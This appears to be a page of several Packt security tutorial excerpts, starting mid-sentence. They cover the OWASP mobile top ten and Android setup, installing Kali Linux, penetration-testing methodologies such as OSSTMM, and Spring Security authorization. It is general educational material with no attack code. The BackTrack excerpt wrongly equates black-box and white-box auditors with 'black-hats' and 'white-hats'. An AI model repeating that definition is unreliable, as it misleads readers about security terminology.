security control mechanisms. It clearly demonstrated the need to protect cross-app mechanisms between the operating system and the app developer. Apple rolled out a security update a week after the XARA research was published. More information can be found at http://www.theregister.co.uk/2015/06/17/apple_hosed_boffins_drop_0day_mac_ios_research_blitzkrieg/ The following graphs show the vulnerabilities in iOS from 2007 until September 2015. There are around 605 reported vulnerabilities for Apple iPhone OS (for more information, visit http://www.cvedetails.com/product/15556/Apple-Iphone-Os.html?vendor_id=49). As you can see, the vulnerabilities have kept on increasing year after year. A majority of the vulnerabilities reported are denial-of-service issues, which make the application unresponsive. Primarily, the vulnerabilities arise due to insecure libraries or buffer overflows on the stack. Rooting/jailbreaking Rooting/jailbreaking refers to the process of removing the limitations imposed by the operating system on devices through the use of exploit tools. Rooting/jailbreaking enables users to gain complete control over the operating system of a device. OWASP's top ten mobile risks In 2013, OWASP polled the industry for new vulnerability statistics in the field of mobile applications. The following risks were finalized in 2014 as the top ten dangerous risks, as per the result of the poll data and the mobile application threat landscape: M1: Weak server-side controls: Internet usage via mobiles has surpassed fixed Internet access. This is largely due to the emergence of hybrid and HTML5 mobile applications. Application servers that form the backbone of these applications must be secured on their own.
The OWASP top 10 web application project defines the most prevalent vulnerabilities in this realm. Vulnerabilities such as injections, insecure direct object reference, insecure communication, and so on may lead to the complete compromise of an application server. Adversaries who have gained control over the compromised servers can push malicious content to all the application users and compromise user devices as well. M2: Insecure data storage: Mobile applications are being used for all kinds of tasks such as playing games, fitness monitors, online banking, stock trading, and so on, and most of the data used by these applications are either stored in the device itself inside SQLite files, XML data stores, log files, and so on, or they are pushed on to Cloud storage. The types of sensitive data stored by these applications may range from location information to bank account details. The application programing interfaces (API) that handle the storage of this data must securely implement encryption/hashing techniques so that an adversary with direct access to these data stores via theft or malware will not be able to decipher the sensitive information that's stored in them. M3: Insufficient transport layer protection: "Insecure Data Storage", as the name says, is about the protection of data in storage. But as all the hybrid and HTML 5 apps work on client-server architecture, emphasis on data in motion is a must, as the data will have to traverse through various channels and will be susceptible to eavesdropping and tampering by adversaries. Controls such as SSL/TLS, which enforce confidentiality and integrity of data, must be verified for correct implementations on the communication channel from the mobile application and its server. M4: Unintended data leakage: Certain functionalities of mobile applications may place users' sensitive data in locations where it can be accessed by other applications or even by malware. These functionalities may be there in order to enhance the usability or user experience but may pose adverse effects in the long run. Actions such as OS data caching, key press logging, copy/paste buffer caching, and implementations of web beacons or analytics cookies for advertisement delivery can be misused by adversaries to gain information about users. M5: Poor authorization and authentication: As mobile devices are the most "personal" devices, developers utilize this to store important data such as credentials locally in the device itself and come up with specific mechanisms to authenticate and authorize users locally for the services that users request via the application. If these mechanisms are poorly developed, adversaries may circumvent these controls and unauthorized actions can be performed. As the code is available to adversaries, they can perform binary attacks and recompile the code to directly access authorized content. M6: Broken cryptography: This is related to the weak controls that are used to protect data. Using weak cryptographic algorithms such as RC2, MD5, and so on, which can be cracked by adversaries, will lead to encryption failure. Improper encryption key management when a key is stored in locations accessible to other applications or the use of a predictable key generation technique will also break the implemented cryptography techniques. M7: Client-side injection: Injection vulnerabilities are the most common web vulnerabilities according to OWASP web top 10 dangerous risks. 
These are due to malformed inputs, which cause unintended actions such as an alteration of database queries, command execution, and so on. In the case of mobile applications, malformed inputs can be a serious threat at the local application level and on the server side as well (refer to M1: Weak server-side controls). Injections at the local application level, which mainly target data stores, may result in conditions such as access to paid content that's locked for trial users, or file inclusions that may lead to an abuse of functionalities such as SMS. M8: Security decisions via untrusted inputs: Implementations of certain functionalities, such as the use of hidden variables to check authorization status, can be bypassed by tampering with them in transit via web service calls or inter-process communication calls. This may lead to privilege escalation and unintended behavior of mobile applications. M9: Improper session handling: The application server sends back a session token on successful authentication with the mobile application. These session tokens are used by the mobile application to request services. If these session tokens remain active for a longer duration and adversaries obtain them via malware or theft, the user account can be hijacked. M10: Lack of binary protection: A mobile application's source code is available to all. An attacker can reverse engineer the application, insert malicious code components, and recompile it. If these tampered applications are installed by a user, they will be susceptible to data theft and may be the victims of unintended actions. Most applications do not ship with mechanisms such as checksum controls, which help in deducing whether the application has been tampered with or not. In 2015, there was another poll under the OWASP Mobile security group, named the "umbrella project". The trend suggests that lack of binary protection may move from M10 up to M2, overtaking weak server-side controls; however, we will have to wait for the final 2015 list. More details can be found at https://www.owasp.org/images/9/96/OWASP_Mobile_Top_Ten_2015_-_Final_Synthesis.pdf. Vulnerable applications to practice The open source community has been proactively designing plenty of mobile applications that can be utilized for practical tests. These are specifically designed to help users understand the OWASP top ten mobile risks. Some of these applications are as follows: iMAS: iMAS is a collaborative research project initiated by the MITRE Corporation (http://www.mitre.org/). It is for application developers and security researchers who would like to learn more about attack and defense techniques in iOS. More information about iMAS can be found at https://github.com/project-imas/about. GoatDroid: A simple functional mobile banking application for training, with location tracking, developed by Jack and Ken for Android application security; it is a great starting point for beginners. More information about GoatDroid can be found at https://github.com/jackMannino/OWASP-GoatDroid-Project. iGoat: The OWASP iGoat project is similar to the WebGoat web application framework. It's designed to improve iOS assessment techniques for developers. More information on iGoat can be found at https://code.google.com/p/owasp-igoat/. Damn Vulnerable iOS Application (DVIA): DVIA is an iOS application that provides a platform for developers, testers, and security researchers to test their penetration testing skills.
This application covers all of the OWASP top 10 mobile risks and also contains several challenges that one can solve and come up with custom solutions for. More information on the Damn Vulnerable iOS Application can be found at http://damnvulnerableiosapp.com/. MobiSec: MobiSec is a live environment for the penetration testing of mobile environments. This framework provides devices, applications, and supporting infrastructure. It provides a great exercise for testers to view vulnerabilities from different points of view. More information on MobiSec can be found at http://sourceforge.net/p/mobisec/wiki/Home/. Android application sandboxing Android utilizes the well-established Linux user-based protection model to isolate applications from each other. In the Linux OS, assigning a unique ID segregates every user. This ensures that there is no cross-account data access. Similarly, in the Android OS, every app is assigned its own unique ID and is run as a separate process. As a result, an application sandbox is formed at the kernel level, and the application is only able to access the resources it is permitted to access. This subsequently ensures that the app does not breach its work boundaries and initiate any malicious activity. For example, the following screenshot provides an illustration of the sandbox mechanism: From the preceding Android sandbox illustration, we can see how the unique Linux user ID created per application is validated every time a resource mapped to the app is accessed, thus ensuring a form of access control. Android Studio and SDK On May 16, 2013, at the Google I/O conference, an Integrated Development Environment (IDE) called Android Studio was released by Katherine Chou under the Apache 2.0 license; it is used to develop apps on the Android platform. It entered the beta stage in 2014; the first stable release, version 1.0, arrived in December 2014, and it was announced as the official IDE on September 15, 2015. Information on Android Studio and the SDK is available at http://developer.android.com/tools/studio/index.html#build-system. Android Studio and the SDK heavily depend on the Java SE Development Kit, which can be downloaded at http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Some developers prefer different IDEs, such as Eclipse. For them, Google only offers SDK downloads (http://dl.google.com/android/installer_r24.4.1-windows.exe). There are minimum system requirements that need to be fulfilled in order to install and use Android Studio effectively. The following procedure is used to install Android Studio on a Windows 7 Professional 64-bit operating system with 4 GB of RAM, 500 GB of hard disk space, and Java Development Kit 7 installed: Install the IDE, which is available for Linux, Windows, and Mac OS X. Android Studio can be downloaded by visiting http://developer.android.com/sdk/index.html. Once Android Studio is downloaded, run the installer file. By default, an installation window will be shown, as shown in the following screenshot. Click on Next: This setup will automatically check whether the system meets the requirements. Choose all the components that are required and click on Next. It is recommended to read and accept the license and click on Next. It is always recommended to create a new folder to install the tools, which will help us track all the evidence in a single place.
In this case, we have created a folder called Hackbox in C:, as shown in the following screenshot: Now, we can allocate the space required for the Android-accelerated environment, which will provide better performance. So, it is recommended to allocate a minimum of 2 GB for this space. All the necessary files will be extracted to C:\Hackbox. Once the installation is complete, you will be able to launch Android Studio, as shown in the following screenshot: Android SDK The Android SDK provides developers with the ability to completely build, test, and debug apps that run on the Android platform. It has all the relevant software libraries, APIs, system images for the emulators, documentation, and other tools that help create an Android app. We have installed Android Studio with the Android SDK. It is crucial to understand how to utilize the built-in SDK tools as much as possible. This section provides an overview of some of the critical tools that we will be using when attacking an Android app during the penetration testing activity. Emulators, simulators, and real devices Sometimes, we tend to believe that all virtual emulations work in exactly the same way as real devices, which is not really the case. Especially for Android, we have multiple OEMs manufacturing multiple devices with different chipsets running different versions of Android. It is a challenge for developers to ensure that all the functionalities of the app behave in the same way on all devices. It is very important to understand the difference between emulators, simulators, and real devices. Simulators The objective of a simulator is to reproduce the state of an object as closely as possible to the state of the real object. It is preferable when testing needs to check how a mobile application interacts with the natural behavior of the available resources. Simulators are reimplementations of the original software; they are difficult to debug and are mostly written in high-level languages. Emulators Emulators predominantly aim at replicating the closest possible behavior of mobile devices. These are typically used to test a mobile's internal behavior, such as hardware, software, and firmware updates. They are typically written in machine-level languages and are easier to debug. An emulator is again a reimplementation of the real software. Pros:
Fast, simple, and with little or no cost associated.
Emulators/simulators are quickly available to test the majority of the functionality of the app that is being developed.
It is very easy to find defects using emulators and fix the issues.
Cons:
The risk of false positives is increased; some of the functions or protections may actually not work on a real device.
Differences in software and hardware will arise. Some emulators might be able to mimic the hardware; however, the app may or may not work when it is actually installed on that particular hardware in reality.
There is a lack of network interoperability. Since emulators are not really connected to a Wi-Fi or cellular network, it may not be possible to test network-based risks/functions.
Real devices Real devices are the physical devices that a user will be interacting with. There are pros and cons of real devices too.
Pros:
Fewer false positives: Results are accurate.
Interoperability: All the test cases run in a live environment.
User experience: Real user experience when it comes to CPU utilization, memory, and so on for a given device.
Performance: Performance issues can be found quickly with real handsets.
Cons:
Costs: There are plenty of OEMs, and buying all the devices is not viable.
A slowdown in development: Connecting a real device to an IDE is not as convenient as using emulators, which can significantly slow down the development process.
Other issues: Devices that are locally connected to the workstation require open USB ports, thus opening an additional entry point.
Threats A threat is something that can harm an asset that we are trying to protect. In mobile device security, a threat is a possible danger that might exploit a vulnerability to compromise and cause potential harm to a device. A threat can be classified by its motive; it can be any of the following:
Intentional: An individual or a group with an aim to break an application and steal information
Accidental: The malfunctioning of a device or an application may lead to a potential disclosure of sensitive information
Others: Capabilities, circumstantial factors, and so on
Threat agents A threat agent is used to indicate an individual or a group that can manifest a threat. Threat agents will be able to perform the following actions: access, misuse, disclose, modify, and deny access. Vulnerability The security weakness within a system that might allow attackers to exploit it and break the security of the device is called a vulnerability. For example, if a mobile device is stolen and it does not have a PIN or passcode enabled, the phone is vulnerable to data theft. Risk The intersection between asset (A), threat (T), and vulnerability (V) is a risk. However, a risk can be combined with the probability (P) of the threat occurring to provide more value to the business. Risk = A x T x V x P These terms will help us understand the real risk to a given asset. The business will benefit only if these risks are accurately assessed. Understanding threat, vulnerability, and risk is the first step in threat modeling. For a given application, no vulnerabilities, or a vulnerability with no threats, is considered to be a low risk. Summary In this article, we saw that mobile devices are susceptible to attacks through various threats, which exist due to the lack of sufficient security measures that can be implemented at various stages of the development of a mobile application. It is necessary to understand how these threats are manifested and learn how to test and mitigate them effectively. Proper knowledge of the underlying architecture and the tools available for the testing of mobile applications will help developers and security testers alike to protect end users from attackers who may be attempting to leverage these vulnerabilities.
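As a final illustration, the Risk = A x T x V x P relationship defined in the Risk section above can be sketched in a few lines of Python. The 0-to-1 scales and the example figures are assumptions chosen for demonstration; the article does not prescribe specific units.

def risk_score(asset_value, threat, vulnerability, probability):
    # Illustrative Risk = A x T x V x P; threat, vulnerability, and probability
    # are expressed here on a 0..1 scale, and asset value in monetary terms.
    return asset_value * threat * vulnerability * probability

# Hypothetical example: an asset worth 100,000, a capable threat agent (0.8),
# a known unpatched flaw (0.6), and a moderate likelihood of occurrence (0.5).
print(risk_score(100_000, 0.8, 0.6, 0.5))   # 24000.0

# A vulnerability with no credible threat (T = 0) scores zero,
# matching the point above that such cases are considered low risk.
print(risk_score(100_000, 0.0, 0.6, 0.5))   # 0.0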

What is Kali Linux

Packt
05 Feb 2015
1 min read
This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. 
Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade
Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]
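If you would rather script the "repeat these commands until there are no more updates" step described above, the following Python sketch is one way to do it with the subprocess module. It must be run as root, and parsing the "N upgraded" summary line is a heuristic based on apt-get's usual English output; treat this as a convenience sketch rather than an official procedure.

import subprocess

def pending_upgrades():
    # Ask apt-get to simulate an upgrade (-s) and read the "N upgraded, ..." summary line.
    out = subprocess.run(["apt-get", "-s", "upgrade"],
                         capture_output=True, text=True, check=True).stdout
    for line in out.splitlines():
        if "upgraded," in line:
            return int(line.split()[0])
    return 0

subprocess.run(["apt-get", "update"], check=True)
while pending_upgrades() > 0:
    subprocess.run(["apt-get", "-y", "upgrade"], check=True)
    subprocess.run(["apt-get", "-y", "dist-upgrade"], check=True)
    subprocess.run(["apt-get", "update"], check=True)
print("No more pending upgrades.")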

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices which should be handled with great care in order to assess the system security correctly. Let's take a look at what this methodology looks like. It will help ensure you're using BackTrack effectively and that your tests are thorough and reliable. Penetration testing can be carried out independently or as a part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, Microsoft SDLC). It is vital to note that the security of a product not only depends on the factors relating to the IT environment, but also relies on product-specific security best practices. This involves implementing appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment, handled by qualified professionals with or without prior knowledge of the system under examination. It can be used to assess all the IT infrastructure components, including applications, network devices, operating systems, communication media, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of a system, followed by their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester to understand and critically analyze the integrity of the current defenses during each stage of the testing process. Different types of penetration testing Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are Black-Box and White-Box. These approaches will be discussed in the following sections. Black-box testing The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as a black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would have occurred following a successful penetration. An ideal penetration tester would dig up any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into a business context. White-box testing The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment.
An auditor engaged with white-box testing is also known as a white-hat. It does bring more value to the organization compared to the black-box approach in the sense that it will eliminate any internal security issues lying in the target infrastructure environment, thus making it harder for a malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is fairly similar to that of black-box testing, except that the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at an early stage, before they get disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than with the black-box approach. The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing, and the auditor engaged with grey-box testing is also known as a grey-hat. The key benefit in devising and practicing a grey-box approach is the set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the grey-box approach are similar to those of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology. Vulnerability assessment versus penetration testing Since the exponential growth of the IT security industry, there have always been wide differences in how the terminology for security assessment is understood and practiced. This involves commercial companies and non-commercial organizations alike, who often misinterpret these terms while contracting for a specific type of security assessment. For this obvious reason, we decided to include a brief description of vulnerability assessment and differentiate its core features from penetration testing. Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organization's assets. This technical infrastructure evaluation not only points out the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides an assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing processes, tools, and techniques is followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerabilities database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management.
A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond identifying vulnerabilities and moves into exploitation, privilege escalation, and maintaining access to the target system. Vulnerability assessment, on the other hand, provides a broad view of the existing flaws in a system without measuring their actual impact. Penetration testing is also considerably more intrusive: it aggressively applies technical methods to exploit the live production environment, whereas vulnerability assessment carefully identifies and quantifies vulnerabilities in a non-invasive manner. Parts of the industry nevertheless treat the two terms as interchangeable, which is wrong. A qualified consultant always works out the most suitable type of assessment from the client's business requirements rather than steering the client toward one or the other, and the contracting party should likewise examine the details of the selected security assessment program before making a final decision. Bear in mind that penetration testing is an expensive service compared to vulnerability assessment.

Security testing methodologies

Various open source methodologies have been introduced to address security assessment needs. They help structure the time-critical and challenging task of assessing system security, whatever its size and complexity. Some of these methodologies focus on the technical side of security testing, others on managerial criteria, and very few address both. The basic idea behind formalizing your assessment with a methodology is to execute different types of tests step by step so that the security of a system can be judged accurately. We therefore introduce four well-known security assessment methodologies, highlighting their key features and benefits:

Open Source Security Testing Methodology Manual (OSSTMM)
Information Systems Security Assessment Framework (ISSAF)
Open Web Application Security Project (OWASP) Top Ten
Web Application Security Consortium Threat Classification (WASC-TC)

All of these frameworks help security professionals choose the strategy that best fits their client's requirements and qualify a suitable testing prototype. The first two provide general guidelines and methods for security testing of almost any information asset; the last two mainly deal with the application security domain. It is important to note, however, that security is an ongoing process: any minor change in the target environment can affect the whole testing process and may introduce errors into the final results. Thus, before applying any of these testing methods, the integrity of the target environment should be assured. Additionally, adopting a single methodology does not necessarily give a complete picture of the risk assessment process.

It remains up to the security auditor to select the strategy that best addresses the target testing criteria and stays consistent with the network or application environment. Many security testing methodologies claim to find every security issue, but choosing the best one still requires a careful selection process in which the accountability, cost, and effectiveness of the assessment are weighed. Determining the right assessment strategy therefore depends on several factors, including the technical details provided about the target environment, resource availability, the penetration tester's knowledge, business objectives, and regulatory concerns. From a business standpoint, pouring blind capital and unneeded resources into a security testing process can endanger the whole business.

Open Source Security Testing Methodology Manual (OSSTMM)

The OSSTMM is a recognized international standard for security testing and analysis and is used by many organizations in their day-to-day assessment cycle. It is based purely on the scientific method, which assists in quantifying operational security and its cost requirements against the business objectives. From a technical perspective, the methodology is divided into four key groups: Scope, Channel, Index, and Vector. The scope defines the process of collecting information on all assets operating in the target environment. A channel determines the type of communication and interaction with those assets, which can be physical, spectrum, or communications; each channel represents a unique set of security components that have to be tested and verified during the assessment period, comprising physical security, human psychology, data networks, wireless communication media, and telecommunications. The index classifies target assets by their particular identifiers, such as MAC address or IP address. Finally, a vector defines the direction from which an auditor can assess and analyze each functional asset. Together, this produces a technical roadmap for evaluating the target environment thoroughly, known as the audit scope.

The different forms of security testing classified under the OSSTMM methodology are organized into six standard security test types:

Blind: Blind testing does not require any prior knowledge of the target system, but the target is informed before the execution of the audit scope. Ethical hacking and war gaming are examples of blind testing. This type is widely accepted because of its ethical stance of informing the target in advance.

Double blind: In double blind testing, the auditor has no prior knowledge of the target system, and the target is not informed before the test is executed. Black-box auditing and penetration testing are examples of double blind testing. Most security assessments today are carried out this way, which puts a real challenge on auditors to select the best-of-breed tools and techniques to achieve their goal.

Gray box: In gray box testing, the auditor holds limited knowledge of the target system, and the target is informed before the test is executed. Vulnerability assessment is a basic example of gray box testing.

Double gray box: Double gray box testing works in a similar way to gray box testing, except that the time frame of the audit is defined and no channels or vectors are tested. A white-box audit is an example of double gray box testing.

Tandem: In tandem testing, the auditor holds minimal knowledge of the target system and the target is notified in advance, before the test is executed. Tandem tests are noted for being conducted thoroughly. Crystal-box and in-house audits are examples of tandem testing.

Reversal: In reversal testing, the auditor holds full knowledge of the target system, and the target is never informed of how or when the test will be conducted. Red teaming is an example of reversal testing.

Which OSSTMM test type follows the rules of Penetration Testing? Double blind testing.

The technical assessment framework provided by the OSSTMM is flexible and capable of deriving test cases that are logically divided into the five security components of the three channels mentioned previously. These test cases generally examine the target by assessing its access control security, process security, data controls, physical location, perimeter protection, security awareness level, trust level, fraud control protection, and many other procedures. The overall testing procedures focus on what has to be tested, how it should be tested, what tactics should be applied before, during, and after the test, and how to interpret and correlate the final results.

Capturing the current state of protection of a target system using security metrics is extremely valuable. The OSSTMM expresses this in the form of RAVs (Risk Assessment Values). The basic function of a RAV is to analyze the test results and compute an actual security value based on three factors: operational security, loss controls, and limitations. This final security value is known as the RAV score. Using the RAV score, an auditor can define milestones, based on the current security posture, for accomplishing better protection. From a business perspective, RAVs can optimize the amount of investment required for security and may help justify better available solutions.

Key features and benefits

Practicing the OSSTMM methodology substantially reduces the occurrence of false negatives and false positives and provides an accurate measurement of security.
Its framework is adaptable to many types of security tests, such as penetration testing, white-box audits, and vulnerability assessments.
It ensures that the assessment is carried out thoroughly and that the results can be aggregated in a consistent, quantifiable, and reliable manner.
The methodology follows four connected phases, namely the definition phase, the information phase, the regulatory phase, and the controls test phase, each of which obtains, assesses, and verifies information about the target environment.
Security metrics are evaluated using the RAV method: the RAV calculates the actual security value based on operational security, loss controls, and limitations, and the resulting RAV score represents the current state of the target's security.
Formalizing the assessment report using the Security Test Audit Report (STAR) template helps management, as well as the technical team, review the testing objectives, risk assessment values, and the output of each test phase.
The methodology is regularly updated to reflect new trends in security testing, regulations, and ethical concerns.
The OSSTMM process can easily be coordinated with industry regulations, business policy, and government legislation. Additionally, a certified audit can be accredited directly by ISECOM (Institute for Security and Open Methodologies).

Understanding the big picture

Packt
04 Sep 2013
7 min read
(For more resources related to this topic, see here.)

So we've got this thing for authentication and authorization. Let's see who is responsible for what. There is an AccessDecisionManager which, as the name suggests, is responsible for deciding whether we can access something or not; if not, an AccessDeniedException or an InsufficientAuthenticationException is thrown. AuthenticationManager is another crucial interface; it is responsible for confirming who we are. Both are just interfaces, so we can swap in our own implementations if we like.

In a web application, the job of talking to these two components and to the user is handled by a web filter called DelegatingFilterProxy, which is decomposed into several small filters. Each one is responsible for a different thing, so we can turn them on or off, or put our own filters in between and mess with them any way we like. These are quite important, and we will dig into them later. For the big picture, all we need to know is that these filters take care of all the talking, redirect the user to the login page (or an access-denied page), and save the current user details in the HTTP session. Well, the last part, while true, is a bit misleading: user details are kept in a SecurityContext object, which we can get hold of by calling SecurityContextHolder.getContext(), and which in the end is stored in the HTTP session by our filters. But we had promised a big picture, not the gory details, so here it is:

Quite simple, right? If we have an authentication protocol without a login and password, it works in a similar way; we just switch one of the filters, or the authentication manager, to a different implementation. If we don't have a web application, we just need to do the talking ourselves.

But this is all for web resources (URLs). What is much more interesting and useful is securing calls to methods. It looks, for example, like this:

@PreAuthorize("isAuthenticated() and hasRole('ROLE_ADMIN')")
public void somethingOnlyAdminCanDo() {}

Here, we decided that somethingOnlyAdminCanDo will be protected by our AccessDecisionManager and that the user must be authenticated (not anonymous) and has to have the admin role. Can a user be anonymous and have the admin role at the same time? In theory yes, but it would not make any sense, so we could drop the isAuthenticated() check and the behavior wouldn't change. Keeping it is a small optimization, because it is much cheaper to check whether the user is authenticated and stop right there.

We can put this kind of annotation on any Java method, but our configuration and the mechanism that fires up the security will depend on the type of object we are trying to protect. For objects declared as Spring beans (which is a short name for anything defined in our Inversion of Control (IoC) configuration, either via XML or annotations), we don't need to do much: Spring will just create proxies (dynamic classes) that take over calls to our secured methods and fire up the AccessDecisionManager before passing the call on to the object we really wanted to call. For objects outside of the IoC container (anything created with new, or code not defined in the Spring context), we can use the power of Aspect Oriented Programming (AOP) to get the same effect. If you don't know what AOP is, don't worry; it's just a bit of magic at the classloader and bytecode level. For now, the only important thing is that it works in basically the same way. This is depicted as follows:

We can do much more than this, as we'll see next, but these are the basics.
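To make that concrete, here is a minimal sketch of a secured Spring bean. The service class, its methods, and the configuration hint in the comments are illustrative assumptions rather than code from this article; they assume that pre/post annotations have been enabled for method security in your Spring configuration.

import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.stereotype.Service;

// Assumes method security is switched on, for example with
// <global-method-security pre-post-annotations="enabled"/> in the XML configuration.
@Service
public class AdminService {

    // Only an authenticated user holding ROLE_ADMIN gets past the AccessDecisionManager.
    @PreAuthorize("isAuthenticated() and hasRole('ROLE_ADMIN')")
    public void somethingOnlyAdminCanDo() {
        // business logic runs only if the security proxy lets the call through
    }

    // Any logged-in (non-anonymous) user may call this method.
    @PreAuthorize("isAuthenticated()")
    public void somethingForAnyUser() {
    }
}

Because AdminService is a Spring bean, the proxy described above is created for us automatically; calling somethingOnlyAdminCanDo() as an authenticated user without the admin role simply results in an AccessDeniedException.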
So, how does the AccessDecisionManager decide whether we can access something or not? Imagine a council of very old Jedi masters sitting around a fire. They decide whether or not you are permitted to call a secured method or access a web resource. Each of these masters makes a decision or abstains, and each of them can consult additional information (not only who you are and what you want to do, but every aspect of the situation). In Spring Security, those smart people are called AccessDecisionVoters, and each of them has one vote.

The council can be organized in many different ways, but it always speaks with one voice: it may make its decision based on a majority of votes; it may be veto-based, where access is allowed unless someone disagrees; or it may require everyone to agree before granting access, otherwise access is denied. The council is the AccessDecisionManager, and the three implementations previously mentioned are available out of the box. We can also decide who sits on the council and who does not. This is probably the most important decision we can make, because it determines the security model that we will use in our application. Let's talk about the most popular counselors (implementations of AccessDecisionVoter).

Model based on roles (RoleVoter): This guy makes his decision based on the role of the user and the role required for the resource/method. So if we write @PreAuthorize("hasRole('ROLE_ADMIN')"), you'd better be a damn admin or you'll get a no-no from this guy.

Model based on entity access control permissions (AclEntryVoter): This guy doesn't worry about roles; he is much more than that. Acl stands for Access Control List, which represents a list of permissions. Every user has a list of permissions, possibly for every domain object (usually an object in the database) that you want to secure. So, for example, if we have a bank application, the supervisor can give Frank access to a single specific customer (say, ACME—A Company that Makes Everything), which is represented as an entity in the database and as an object in our system. No other employee will be able to do anything to that customer unless the supervisor grants that person the same permission as Frank. This is probably the most fine-grained voter we would ever use, and our customer can be given a very detailed configuration with it. On the other hand, it is also the most cumbersome, as we need to create a usable graphical interface for setting permissions for every user and every domain object. While we have done this a few times, most of our customers wanted a simpler approach, and even those who started with a graphical user interface to configure everything asked for a simplified version based on business rules at the end of the project. If your customer describes his security needs in terms of rules such as "Frank can edit every customer he has created, but he can only view other customers", it means it's time for PreInvocationAuthorizationAdviceVoter.

Business rules model (PreInvocationAuthorizationAdviceVoter): This is usually used when you want to implement static business rules in the application. These go like "if I've written a blog post, I can change it later, but others can only comment" and "if a friend asked me to help him write the blog post, I can do that, because I'm his friend". Most of these things are also possible to implement with ACLs, but that would be very cumbersome. This is our favorite voter. With it, it's very easy to write, test, and change the security restrictions, because instead of recording every possible relation in the database (as with the ACL voter) or having only dumb roles, we write our security logic in plain old Java classes. Great stuff and most useful, once you see how it works.

Did we mention that this is a council? Yes, we did. The result is that we can mix any voters we want and choose any council organization we like. We can have all three voters previously mentioned and allow access if any of them says "yes". There are even more voters, and we can write new ones ourselves. Do you feel the power of the Jedi council already?

Summary

This section provided an overview of authentication and authorization, which are the core principles of Spring Security.

Resources for Article:

Further resources on this subject:
